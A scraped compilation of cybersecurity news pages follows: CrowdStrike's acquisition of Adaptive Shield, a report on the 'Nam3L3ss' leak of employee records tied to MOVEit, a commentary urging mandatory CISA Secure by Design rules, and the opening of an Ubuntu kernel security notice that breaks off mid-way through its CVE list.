Adaptive Shield is the third security posture management provider the company has acquired in the last 14 months as identity-based attacks continue to rise.

Source: Artemis Diana via Alamy Stock Photo

CrowdStrike's spending spree for security posture management capabilities continued with a deal to buy Adaptive Shield, an Israeli startup  that specializes in securing organizations' SaaS ecosystems and protecting against identity-based attacks.

Last week's deal calls for CrowdStrike to pay cash and stock for Adaptive Shield; CrowdStrike expects to complete the transaction by the end of January 2025. Press reports estimate the value of the deal at around $300 million.

Founded in 2019, Adaptive Shield is one of many companies in the SaaS security posture management (SSPM) sector; others include AppOmni, DoControl, Obsidian, and Reco. 

Adaptive Shield's platform supports more than 150 SaaS applications including Adobe, Google Workspace, Microsoft 365, Salesforce, Slack, and Zoom. It monitors for misconfigurations and identity threats, and offers a no-code tool for custom SaaS applications called Integration Builder.

**Competitive Impact?**

Omdia senior principal analyst Rik Turner wonders whether the deal will prompt CrowdStrike's competitors like Cisco, Palo Alto Networks, and Sentinal One to follow suit with their own deals. Overall, it's been an active time for acquisitions of cloud and data security posture management (DSPM) startups, he noted. 

Adaptive Shield is CrowdStrike's third security posture management provider in the last 18 months. In October 2023, CrowdStrike bought Bionic, an early provider of application security posture management (ASPM), extending security risk visibility from code development to cloud deployment. 

Earlier this year, CrowdStrike bought Flow Security, another DSPM cloud platform that protects data at rest and in motion. "In contrast, there has been no such buying frenzy with SSPMs. CrowdStrike's acquisition of Adaptive Shield is the first deal of this kind, raising the question of whether it might start a trend among the purchaser’s competitors," Turner note in a recent report.

CrowdStrike emphasizes that the addition of Adaptive Shield will boost the capability of its Falcon platform to protect organizations against identity-based attacks by adding SaaS applications to the mix. 

Once integrated into Falcon, Adaptive Shield's SSPM platform will give organizations visibility into misconfigurations, unnecessary or rogue privileges, and activities undertaken among accounts of on-premises and cloud identity providers as well as SaaS security applications. The addition "provides organizations with granular visibility into their growing cloud environments, enables them to manage and secure their SaaS security posture and their human and non-human identities, and helps them detect and prevent identity-centric, cloud-focused cyberattacks," CrowdStrike president Michael Sentonas explained in a blog post.

CrowdStrike senior product manager for identity Ryan Terry buttressed that message at a company meeting last week in Amsterdam. "Our vision is to unify identity protection across the entire Falcon security platform that includes cloud security," he said. "That will bring ISPM, CIEM, and ITDR together in an integrated way, in one single platform to help you address today's modern identity challenges."

**Keying in on Identity**

SaaS connectors will improve visibility into threat activity and precursors to identity-based attacks, says Forrester Research principal analyst Andras Cser. And he believes adding SSPM to CrowdStrike Falcon will fill a gap in the platform's identity protection module.

"Identity-wise, CrowdStrike claims they have ITDR, but in reality, it's mainly cloud infrastructure entitlement management, addressing how admins have access to policies that drive privileges on things like \[AWS\] S3 buckets and Azure Blobs and things like that," Cser says. "It's not true \[identity and access management\] in the sense of user account provisioning-deprovisioning, federation, token service, and all these other types of things."

The Adaptive Shield SSPM and ITDR platform promises to provide a broad range of protection against such attacks by providing unified, hybrid identity management for SaaS-based apps and on-premises authentication, notably Microsoft's Active Directory.

Adaptive Shield's platform also continuously monitors generative AI-based SaaS applications for configuration shifts and enforces security standards and privileges. And it's designed to prevent data exfiltration and discover unauthorized AI applications. "Beyond identities, it also provides visibility into misconfigurations and other risks affecting SaaS applications so organizations can better manage these issues and detect and respond to threats," Sentonas added.

Identity-Based Attacks Continue to Mount

Vendor focus on identity isn't happening in a vacuum. Threat actors such as Scattered Spider and Cozy Bear (also known as APT29 and Midnight Blizzard) have actively exploited identity through various techniques, including password spraying, phishing, stealing legitimate credentials, and exploiting misconfigurations. 

After managing to get global administrator rights to MGM Resorts' Azure instances last year, Scattered Spider was able to exfiltrate data and disrupt its operations. Earlier this year, Microsoft was among the victims of a password spray attack by Russia-based Midnight Blizzard, compromising its corporate email systems. Overall, CrowdStrike has claimed that 80% of breaches now have an identity component.  

At the RSA Conference earlier in the year, Sentonas and CrowdStrike co-founder and CEO George Kurtz demonstrated how hackers exploit identity provider misconfigurations with phish-able authentication factors to gain access to highly privileged accounts. "They move laterally once they're inside an organization to achieve their outcome," Sentonas said.

**More Identity Features in the Wings**

Ross Penny, a principal technical strategist for CrowdStrike, said the company plans to roll out several tools to bolster CrowdStrike Falcon Identity by February 2025. Among recent and current deliverables include integration with AWS Identity Center, which reports on the "full picture" of risks associated with federated AWS accounts. 

"If you're only looking within AWS because it's federated, you lack a lot of information about it," Penny explained. "The fact that we know where that account lives and originates means you have a much wider variety of risk that you're able to use to calculate those access decisions and detections."

Penny said that CrowdStrike is also readying a policy management API that can be integrated into external workflows. CrowdStrike developed this API because many of its customers also use ServiceNow.

Early next year, CrowdStrike will extend integration with other identity providers, including Okta Universal Directory, Google Workspace, and AWS permission usage analysis. CrowdStrike also plans to add attack path detection across those multiple identity providers in 2025.

Don't miss the upcoming free Dark Reading Virtual Event, "Know Your Enemy: Understanding Cybercriminals and Nation-State Threat Actors," Nov. 14 at 11 am ET. Don't miss sessions on understanding MITRE ATT&CK, using proactive security as a weapon, and a masterclass in incident response; and a host of top speakers like Larry Larsen from the Navy Credit Federal Union, former Kaspersky Lab analyst Costin Raiu, Ben Read of Mandiant Intelligence, Rob Lee from SANS, Dr. Max Smeets from ETH Zurich, and Elvia Finalle from Omdia. Register now!

**About the Author**

Jeffrey Schwartz is a journalist who has covered information security and all forms of business and enterprise IT, including client computing, data center and cloud infrastructure, and application development for more than 30 years. Jeff is a regular contributor to Channel Futures. Previously, he was editor-in-chief of Redmond magazine and contributed to its sister titles Redmond Channel Partner, Application Development Trends, and Virtualization Review. Earlier, he held editorial roles with CommunicationsWeek, InternetWeek, and VARBusiness. Jeff is based in the New York City suburb of Long Island.

CrowdStrike Spends to Boost Identity Threat Detection

Aftermath of MOVEit vulnerability: Data vigilante ‘Nam3L3ss’ leaks nearly 8 million employee records from industry giants like Amazon,…

Aftermath of MOVEit vulnerability: Data vigilante ‘Nam3L3ss’ leaks nearly 8 million employee records from industry giants like Amazon, 3M, HP, and Delta, exposing cybersecurity flaws across major firms.

A “Data Vigilante” using the alias Nam3L3ss has leaked millions of employee records from global industry giants, in connection with the widespread **MOVEit vulnerability**. For your information, the MOVEit flaw is a security vulnerability in the MOVEit file transfer software, which many organizations use to share sensitive data.

Nam3L3ss, who denies being a hacker, began leaking the data on Friday, November 8, 2024. So far, sensitive and non-sensitive records from 27 companies, totalling 7,952,414 employee records, have been exposed. This includes 2,861,111 records from Amazon employees, a breach acknowledged by the company.

“Amazon and AWS systems remain secure, and we have not experienced a security event. We were notified about a security event at one of our property management vendors that impacted several of its customers including Amazon,” Amazon spokesperson Adam Montgomery told Hackread.com. “The only Amazon information involved was employee work contact information, for example, work email addresses, desk phone numbers, and building locations.”

****Data Analysis****

The Hackread.com research team conducted an in-depth analysis of each file leaked by Nam3L3ss, revealing that the data includes full names, email addresses, phone numbers, office addresses, residential addresses, company names, location coordinates, and more.

****List of Affected Companies and Employee Counts****

    3M: 48,630 employees
    
    HP: 104,119 employees
    
    Delta: 57,317 employees
    
    MetLife: 585,130 employees
    
    Amazon: 2,861,111 employees
    
    McDonald's: 3,295 employees
    
    Lenovo: 45,522 employees
    
    TIAA: 2,464,625 employees
    
    CalSTRS: 422,311 employees
    
    BT: 15,347 employees
    
    URBN: 17,553 employees
    
    Leidos: 52,610 employees
    
    UBS: 20,462 employees
    
    HSBC: 280,693 employees
    
    Firmenich: 13,248 employees
    
    U.S. Bank: 114,076 employees
    
    Canada Post: 69,860 employees
    
    Westinghouse: 18,193 employees
    
    Rush University: 15,853 employees
    
    Omnicom Group: 37,320 employees
    
    Charles Schwab: 49,356 employees
    
    City National Bank: 9,358 employees
    
    Applied Materials: 53,170 employees
    
    Cardinal Health: 407,437 employees
    
    Bristol-Myers Squibb: 37,497 employees
    
    TIAA (additional listing): 23,857 employees
    
    Fidelity Investments: 124,464 employees

List of targeted companies (Screenshot credit: Hackread.com)

****Nam3L3ss’s Manifesto: Motivation and Methodology****

In a post on Breach Forums, Nam3L3ss outlined their “manifesto” to explain who they are and why they’re leaking data. According to the post, they monitor misconfigured and unsecured cloud databases across various services, including AWS Buckets, Azure, Digital Ocean, Google, and FTP and MongoDB servers, to extract and make this data public.

Nam3L3ss also claims to monitor ransomware groups, analyze stolen data, clean it by removing duplicates and irrelevant information, and then release it online. For example, the leaked MetLife employee directory originated from MetLife, a global financial services firm that suffered a ransomware attack in 2023.

Nam3L3ss intro and Manifesto (Screenshot credit: Hackread.com)

The Cl0p ransomware gang exploited MOVEit extensively, targeting hundreds of organizations worldwide. They even **created clear web websites to leak** the stolen data in July 2024.

**Ferhat Dikbiyik**, chief research and intelligence officer at Black Kite, weighed in on the recent Amazon data breach, explaining, that Amazon’s recent data breach traced back to a third-party vendor’s use of the MOVEit tool, is another wake-up call for the supply chain’s hidden vulnerabilities.

“Amazon’s recent data breach traced back to a third-party vendor’s use of the MOVEit tool, is another wake-up call for the supply chain’s hidden vulnerabilities. The MOVEit flaw initially hit hundreds, but the shockwave extended across 2,700+ organizations as the ripple effects reached third and even fourth-party vendors,” Ferhat said.

“We’ve identified over 600 MOVEit servers that were likely caught in this “spray” attack—leaving a vast field of potential targets,” he explained. “CL0P ransomware, the group exploiting this flaw, named 270 victims within three months, and the count is still rising.”

“With 200 to 400 organizations speculated to have paid ransoms, the real impact stretches far beyond these numbers. This breach emphasizes that ransomware risk doesn’t stop at your company’s doorstep. In today’s ecosystem, exposure management must extend across the entire supply chain to truly defend against the next big attack.”

****Data Vigilante?****

Although the term Data Vigilante is debatable, Nam3L3ss expresses frustration with companies and government institutions for failing to secure their networks. By leaking this data, they aim to raise awareness about data security and encourage better cybersecurity practices.

****Implications of the Data Leak and Advice to Employees****

Although passwords and financial details weren’t included in the leaked files, the exposure poses significant risks to companies and employees. Threat actors, especially state-sponsored groups like **North Korea’s Lazarus Group**, are known to exploit such data to initiate phishing scams, steal cryptocurrency, and access financial information that could aid their **country’s economy**.

If you work for one of the affected companies, be on the lookout for phishing scams via email, SMS phishing (smishing), and voice phishing (vishing) attempts, as attackers may try to exploit this data for further scams.

1.  Hacker Leaks Thousands of Microsoft and Nokia Employee Details
2.  Hackers Calling Employees to Steal VPN Credentials from US Firms
3.  Hacker Leaks Data of 33K Accenture Employees in 3rd-Party Breach
4.  Shadow IT: Personal GitHub Repos Expose Employee Cloud Secrets
5.  Indian Ex-Employee Jailed for Wiping 180 Virtual Servers in Singapore

Data Vigilante Leaks 8 Million Employee Records from Amazon, HP and Others

CISA should make its recommended goals mandatory and perform audits to ensure compliance.

Gary Barlet, Public Sector Chief Technology Officer, Illumio

November 12, 2024

5 Min Read

Source: Zoonar GmbH via Alamy Stock Photo

COMMENTARY  
Companies across the country are lining up to join the latest cybersecurity trend: the Cybersecurity and Infrastructure Security Agency's (CISA) Secure by Design pledge, a commitment aimed at software manufacturers that compels them to keep up with fundamental cybersecurity strategies. Companies such as Lenovo, Google, AWS, Cloudflare, and Microsoft have already signed on. 

On the face of it, the Secure by Design pledge is a good thing. Its seven goals each encourage manufacturers to adopt or increase the usage of a key cybersecurity strategy within one year. The goals, such as "implement multifactor authentication (MFA)" are worthy, if basic, and CISA encourages companies to document their progress. If they fall short, they are also encouraged to report that failure to CISA. 

The problem is that this pledge is entirely voluntary. Companies are free to sign it — or not — as they wish. And there's no regulatory compliance factored in. This means that if a company does sign the pledge and falls short of one or more goals, no one may ever know and no action will be taken. It will be as if the pledge never existed in the first place.   

Without teeth, the pledge is essentially worthless. Outside of highlighting the low-bar steps major companies should take to ensure their infrastructure is secured from the most common attacks (which, admittedly, is a good thing), it takes no steps to ensure that companies will actually do so. And it provides no repercussions if they fail.    

**Is the Honor System Good Enough?**

With data breaches up 72% in 2023 and the average cost of a breach estimated at $4.88 million, can we afford for our nation's technological infrastructure to be governed by the honor system? What happens when the next big cyberattack takes down a pillar of our society because the company responsible failed to implement MFA?  

I'd argue for a much more aggressive approach from our federal government. Given the potential for widespread disruptions inherent with any cybersecurity failure, we can't afford to take such a lax attitude toward securing our systems. The sanctity of our nation's airlines, power grids, and other critical infrastructure relies on stringent cybersecurity measures. Merely "suggesting" that companies institute basic protocols is not enough. We need to mandate it — and punish those who fail. 

**The EU's Higher Standard**

I look at the European Union's approach to setting standards for its electronic devices. In 2022,  the EU passed a law mandating electronics manufacturers move to a standardized charging port for their mobile devices. The EU's stance toward Apple, which famously used a proprietary Lightning charging port for its iPhones, was simply: Adapt or die. Apple adapted. As a result, iPhones in Europe are now sold with the standardized USB-C charging port, alongside every other mobile device. 

The EU did not fool around with vague suggestions or pledges. It saw the value to consumers of a standardized charging port and demanded that manufacturers make the change. Those that failed to comply were not allowed to sell their devices in Europe. Simple. Effective. 

You can also look closer to home, to California, for an example of this kind of confident action by the government. The government of California adopted the Zero Emissions Vehicle requirements in 1990, and has adjusted the rules over the ensuing decades as technology has evolved. The purpose was to protect the state's air from automotive pollution. The result has been a near industrywide reduction in auto emissions for the past 30 years. 

For vehicle manufacturers that want to sell cars in California, the largest economy in the United States, the equation was the same one facing Apple in the EU: Adapt or die. They could either engineer their vehicles to produce fewer emissions or simply not sell them in California. Most elected for the former option, and, as a result, automotive emission control technology has advanced further in the past 30 years than at any point since the automobile was introduced. 

**Adopting a Similar Approach**

To protect our cyber infrastructure, we need to adopt a similar approach. Instead of simply making recommendations, our nation's cybersecurity agency should be empowered to make regulations.  

CISA should begin by making its recommended goals mandatory, forcing software companies to do the following: 

●      Increase the use of MFA 

●      Reduce default passwords 

●      Enable a significant measurable reduction in the prevalence of one or more vulnerability classes 

●      Increase the installation of security patches by customers 

●      Publish a vulnerability disclosure policy 

●      Demonstrate transparency in vulnerability reporting. 

●      Increase the ability for customers to gather evidence of cybersecurity intrusions 

Next, CISA should perform audits to ensure compliance. Relying on companies to self-report is no different from giving them permission not to report. Look closely at CISA's list of pledgees and come back in a year to see how many of these vaunted companies will have willingly admitted they aren't taking the most basic steps toward protecting their users' data. 

Finally, CISA should be empowered to make a simple statement to software manufacturers that want to sell products in the US similar to what the EU said to electronics manufacturers and what California said to automobile manufacturers: Adapt or die. 

If you want to sell software in the US, you should have to follow basic principles that will ensure your software is safe. This should not be a "nice to have." It should be mandatory. The stakes are as high if not higher than with charging ports and automobile emissions. As we witnessed with the recent failure of cybersecurity software, the impact was felt across entire industries and resulted in billions of dollars in lost productivity. This is not a realm for timidity.    

Hi all -- please add this to all of your content at the bottom between now and Thursday -- I'm adding it to this week's news items now. Rashid, Fahmida Donahue, Jim Bracken, Becky Spiegelman, Karen Beek, Kristina

Don't miss the upcoming free Dark Reading Virtual Event, "Know Your Enemy: Understanding Cybercriminals and Nation-State Threat Actors," Nov. 14 at 11 a.m. ET. Don't miss sessions on understanding MITRE ATT&CK, using proactive security as a weapon, and a masterclass in incident response; and a host of top speakers like Larry Larsen from the Navy Credit Federal Union, former Kaspersky Lab analyst Costin Raiu, Ben Read of Mandiant Intelligence, Rob Lee from SANS, and Elvia Finalle from Omdia. Register now!

**About the Author**

Public Sector Chief Technology Officer, Illumio

Gary Barlet has nearly three decades of cloud, cybersecurity, and network experience in the US federal government leading security and IT teams in both civilian agencies and the Department of Defense (DoD). At Illumio, Gary works with government agencies, contractors, and the broader ecosystem to build in zero-trust segmentation as a strategic component of the government’s zero-trust architecture. Before joining Illumio, Gary served as the chief information officer at the Office of the Inspector General for the US Postal Service and served in the Air Force in several technology leadership capacities, retiring from his role as cyber operations officer.

The Power of the Purse: How to Ensure Security by Design

Ubuntu Security Notice 7100-1 - Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, and Shweta Shinde discovered that the Confidential Computing framework in the Linux kernel for x86 platforms did not properly handle 32-bit emulation on TDX and SEV. An attacker with access to the VMM could use this to cause a denial of service or possibly execute arbitrary code. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7100-1November 11, 2024linux, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop,linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-kvm,linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle,linux-oracle-5.15, linux-raspi, linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, andShweta Shinde discovered that the Confidential Computing framework inthe Linux kernel for x86 platforms did not properly handle 32-bitemulation on TDX and SEV. An attacker with access to the VMM could usethis to cause a denial of service (guest crash) or possibly executearbitrary code. (CVE-2024-25744)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - MIPS architecture;  - PowerPC architecture;  - RISC-V architecture;  - User-Mode Linux (UML);  - x86 architecture;  - Block layer subsystem;  - Android drivers;  - Serial ATA and Parallel ATA drivers;  - ATM drivers;  - Drivers core;  - Null block device driver;  - Character device driver;  - ARM SCMI message protocol;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - I3C subsystem;  - InfiniBand drivers;  - Input Device core drivers;  - Input Device (Miscellaneous) drivers;  - IOMMU subsystem;  - IRQ chip drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Device tree and open firmware driver;  - Parport drivers;  - PCI subsystem;  - Pin controllers subsystem;  - Remote Processor subsystem;  - S/390 drivers;  - SCSI drivers;  - QCOM SoC drivers;  - Direct Digital Synthesis drivers;  - Thunderbolt and USB4 drivers;  - TTY drivers;  - Userspace I/O drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Host Controller drivers;  - USB Type-C Connector System Software Interface driver;  - USB over IP driver;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - NILFS2 file system;  - NTFS3 file system;  - Proc file system;  - SMB network file system;  - Core kernel;  - DMA mapping infrastructure;  - RCU subsystem;  - Tracing infrastructure;  - Radix Tree data structure library;  - Kernel userspace event delivery library;  - Objagg library;  - Memory management;  - Amateur Radio drivers;  - Bluetooth subsystem;  - Ethernet bridge;  - CAN network layer;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - KCM (Kernel Connection Multiplexor) sockets driver;  - MAC80211 subsystem;  - Multipath TCP;  - Netfilter;  - Network traffic control;  - SCTP protocol;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Wireless networking;  - AppArmor security module;  - Landlock security;  - Simplified Mandatory Access Control Kernel framework;  - FireWire sound drivers;  - SoC audio core drivers;  - USB sound devices;(CVE-2024-43817, CVE-2024-42304, CVE-2024-46756, CVE-2024-42318,CVE-2024-41090, CVE-2024-41063, CVE-2024-44987, CVE-2024-46844,CVE-2024-46677, CVE-2024-44988, CVE-2024-42297, CVE-2024-26893,CVE-2024-46673, CVE-2024-26800, CVE-2024-42305, CVE-2024-46731,CVE-2024-41091, CVE-2024-46810, CVE-2024-41072, CVE-2022-48666,CVE-2024-38602, CVE-2024-46780, CVE-2024-46750, CVE-2024-43858,CVE-2024-41020, CVE-2024-46755, CVE-2024-46829, CVE-2024-41068,CVE-2024-45003, CVE-2024-42280, CVE-2024-42283, CVE-2024-43873,CVE-2024-46746, CVE-2024-44969, CVE-2024-46807, CVE-2024-41081,CVE-2024-44971, CVE-2024-26607, CVE-2024-43880, CVE-2024-42281,CVE-2024-42274, CVE-2024-43908, CVE-2024-42267, CVE-2024-47665,CVE-2024-45011, CVE-2024-46707, CVE-2024-42310, CVE-2024-42309,CVE-2024-44965, CVE-2024-46747, CVE-2024-42259, CVE-2024-46804,CVE-2024-46679, CVE-2024-45007, CVE-2024-45009, CVE-2024-46771,CVE-2024-46739, CVE-2024-41060, CVE-2024-46676, CVE-2024-46822,CVE-2024-42272, CVE-2024-41059, CVE-2024-43839, CVE-2024-46817,CVE-2024-47669, CVE-2024-44999, CVE-2024-42285, CVE-2024-44986,CVE-2024-43828, CVE-2024-43879, CVE-2024-44998, CVE-2024-46724,CVE-2024-41015, CVE-2024-45025, CVE-2024-43849, CVE-2024-46818,CVE-2024-43830, CVE-2024-46725, CVE-2024-43834, CVE-2024-42302,CVE-2024-36484, CVE-2024-43853, CVE-2024-46782, CVE-2024-46740,CVE-2024-46732, CVE-2024-43869, CVE-2024-42312, CVE-2024-42292,CVE-2024-43884, CVE-2024-44934, CVE-2024-44995, CVE-2024-43894,CVE-2024-46675, CVE-2024-43870, CVE-2024-44990, CVE-2024-42287,CVE-2024-41065, CVE-2024-42301, CVE-2024-42290, CVE-2024-46702,CVE-2024-46719, CVE-2024-46745, CVE-2024-46758, CVE-2024-46757,CVE-2024-44935, CVE-2024-42276, CVE-2024-43890, CVE-2023-52918,CVE-2024-41077, CVE-2024-43905, CVE-2024-38611, CVE-2024-42269,CVE-2024-42284, CVE-2024-41073, CVE-2024-46722, CVE-2024-41017,CVE-2024-47667, CVE-2024-45021, CVE-2024-43867, CVE-2024-41098,CVE-2024-43909, CVE-2024-46723, CVE-2024-45026, CVE-2024-42114,CVE-2024-44944, CVE-2024-43835, CVE-2024-44982, CVE-2024-43907,CVE-2024-46828, CVE-2024-43856, CVE-2024-46832, CVE-2024-44954,CVE-2024-43846, CVE-2024-41070, CVE-2024-43892, CVE-2024-44985,CVE-2024-42306, CVE-2024-43889, CVE-2024-44958, CVE-2024-46798,CVE-2024-44989, CVE-2024-42313, CVE-2024-46737, CVE-2024-42289,CVE-2024-43829, CVE-2024-46744, CVE-2023-52889, CVE-2024-46689,CVE-2024-47663, CVE-2024-46791, CVE-2024-43863, CVE-2024-43893,CVE-2024-43841, CVE-2024-46777, CVE-2024-46800, CVE-2024-45028,CVE-2024-44952, CVE-2024-43883, CVE-2024-44946, CVE-2024-43882,CVE-2024-44960, CVE-2024-38577, CVE-2024-46814, CVE-2024-42288,CVE-2024-44947, CVE-2024-41071, CVE-2024-41042, CVE-2024-41064,CVE-2024-42311, CVE-2024-42270, CVE-2024-43861, CVE-2024-46752,CVE-2024-42296, CVE-2024-41022, CVE-2024-42246, CVE-2024-43871,CVE-2024-42265, CVE-2024-43854, CVE-2024-41019, CVE-2024-46815,CVE-2024-46743, CVE-2024-42126, CVE-2024-26661, CVE-2024-41012,CVE-2024-46761, CVE-2024-45008, CVE-2024-46805, CVE-2024-45006,CVE-2024-42295, CVE-2024-46783, CVE-2024-42286, CVE-2024-46714,CVE-2024-42299, CVE-2024-46781, CVE-2024-43914, CVE-2024-44966,CVE-2024-44974, CVE-2024-45018, CVE-2024-46840, CVE-2024-46819,CVE-2024-40915, CVE-2024-46759, CVE-2024-43860, CVE-2024-47668,CVE-2024-39472, CVE-2024-47660, CVE-2024-47659, CVE-2024-46795,CVE-2024-43875, CVE-2024-46738, CVE-2024-42271, CVE-2024-26669,CVE-2024-44983, CVE-2024-41078, CVE-2024-46685, CVE-2024-46713,CVE-2024-46721, CVE-2024-46763, CVE-2024-41011, CVE-2024-43902,CVE-2024-42277, CVE-2024-44948)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1038-xilinx-zynqmp  5.15.0-1038.42  linux-image-5.15.0-1055-gkeop   5.15.0-1055.62  linux-image-5.15.0-1065-ibm     5.15.0-1065.68  linux-image-5.15.0-1065-raspi   5.15.0-1065.68  linux-image-5.15.0-1067-nvidia  5.15.0-1067.68  linux-image-5.15.0-1067-nvidia-lowlatency  5.15.0-1067.68  linux-image-5.15.0-1069-gke     5.15.0-1069.75  linux-image-5.15.0-1069-kvm     5.15.0-1069.74  linux-image-5.15.0-1070-oracle  5.15.0-1070.76  linux-image-5.15.0-1071-gcp     5.15.0-1071.79  linux-image-5.15.0-125-generic  5.15.0-125.135  linux-image-5.15.0-125-generic-64k  5.15.0-125.135  linux-image-5.15.0-125-generic-lpae  5.15.0-125.135  linux-image-5.15.0-125-lowlatency  5.15.0-125.135  linux-image-5.15.0-125-lowlatency-64k  5.15.0-125.135  linux-image-gcp-lts-22.04       5.15.0.1071.67  linux-image-generic             5.15.0.125.124  linux-image-generic-64k         5.15.0.125.124  linux-image-generic-lpae        5.15.0.125.124  linux-image-gke                 5.15.0.1069.68  linux-image-gke-5.15            5.15.0.1069.68  linux-image-gkeop               5.15.0.1055.54  linux-image-gkeop-5.15          5.15.0.1055.54  linux-image-ibm                 5.15.0.1065.61  linux-image-kvm                 5.15.0.1069.65  linux-image-lowlatency          5.15.0.125.113  linux-image-lowlatency-64k      5.15.0.125.113  linux-image-nvidia              5.15.0.1067.67  linux-image-nvidia-lowlatency   5.15.0.1067.67  linux-image-oracle-lts-22.04    5.15.0.1070.66  linux-image-raspi               5.15.0.1065.63  linux-image-raspi-nolpae        5.15.0.1065.63  linux-image-virtual             5.15.0.125.124  linux-image-xilinx-zynqmp       5.15.0.1038.42Ubuntu 20.04 LTS  linux-image-5.15.0-1055-gkeop   5.15.0-1055.62~20.04.1  linux-image-5.15.0-1065-ibm     5.15.0-1065.68~20.04.1  linux-image-5.15.0-1070-oracle  5.15.0-1070.76~20.04.1  linux-image-5.15.0-1071-gcp     5.15.0-1071.79~20.04.1  linux-image-5.15.0-1072-aws     5.15.0-1072.78~20.04.1  linux-image-5.15.0-125-generic  5.15.0-125.135~20.04.1  linux-image-5.15.0-125-generic-64k  5.15.0-125.135~20.04.1  linux-image-5.15.0-125-generic-lpae  5.15.0-125.135~20.04.1  linux-image-5.15.0-125-lowlatency  5.15.0-125.135~20.04.1  linux-image-5.15.0-125-lowlatency-64k  5.15.0-125.135~20.04.1  linux-image-aws                 5.15.0.1072.78~20.04.1  linux-image-gcp                 5.15.0.1071.79~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.125.135~20.04.1  linux-image-generic-hwe-20.04   5.15.0.125.135~20.04.1  linux-image-generic-lpae-hwe-20.04  5.15.0.125.135~20.04.1  linux-image-gkeop-5.15          5.15.0.1055.62~20.04.1  linux-image-ibm                 5.15.0.1065.68~20.04.1  linux-image-lowlatency-64k-hwe-20.04  5.15.0.125.135~20.04.1  linux-image-lowlatency-hwe-20.04  5.15.0.125.135~20.04.1  linux-image-oem-20.04           5.15.0.125.135~20.04.1  linux-image-oem-20.04b          5.15.0.125.135~20.04.1  linux-image-oem-20.04c          5.15.0.125.135~20.04.1  linux-image-oem-20.04d          5.15.0.125.135~20.04.1  linux-image-oracle              5.15.0.1070.76~20.04.1  linux-image-virtual-hwe-20.04   5.15.0.125.135~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7100-1  CVE-2022-48666, CVE-2023-52889, CVE-2023-52918, CVE-2024-25744,  CVE-2024-26607, CVE-2024-26661, CVE-2024-26669, CVE-2024-26800,  CVE-2024-26893, CVE-2024-36484, CVE-2024-38577, CVE-2024-38602,  CVE-2024-38611, CVE-2024-39472, CVE-2024-40915, CVE-2024-41011,  CVE-2024-41012, CVE-2024-41015, CVE-2024-41017, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41022, CVE-2024-41042, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41063, CVE-2024-41064, CVE-2024-41065,  CVE-2024-41068, CVE-2024-41070, CVE-2024-41071, CVE-2024-41072,  CVE-2024-41073, CVE-2024-41077, CVE-2024-41078, CVE-2024-41081,  CVE-2024-41090, CVE-2024-41091, CVE-2024-41098, CVE-2024-42114,  CVE-2024-42126, CVE-2024-42246, CVE-2024-42259, CVE-2024-42265,  CVE-2024-42267, CVE-2024-42269, CVE-2024-42270, CVE-2024-42271,  CVE-2024-42272, CVE-2024-42274, CVE-2024-42276, CVE-2024-42277,  CVE-2024-42280, CVE-2024-42281, CVE-2024-42283, CVE-2024-42284,  CVE-2024-42285, CVE-2024-42286, CVE-2024-42287, CVE-2024-42288,  CVE-2024-42289, CVE-2024-42290, CVE-2024-42292, CVE-2024-42295,  CVE-2024-42296, CVE-2024-42297, CVE-2024-42299, CVE-2024-42301,  CVE-2024-42302, CVE-2024-42304, CVE-2024-42305, CVE-2024-42306,  CVE-2024-42309, CVE-2024-42310, CVE-2024-42311, CVE-2024-42312,  CVE-2024-42313, CVE-2024-42318, CVE-2024-43817, CVE-2024-43828,  CVE-2024-43829, CVE-2024-43830, CVE-2024-43834, CVE-2024-43835,  CVE-2024-43839, CVE-2024-43841, 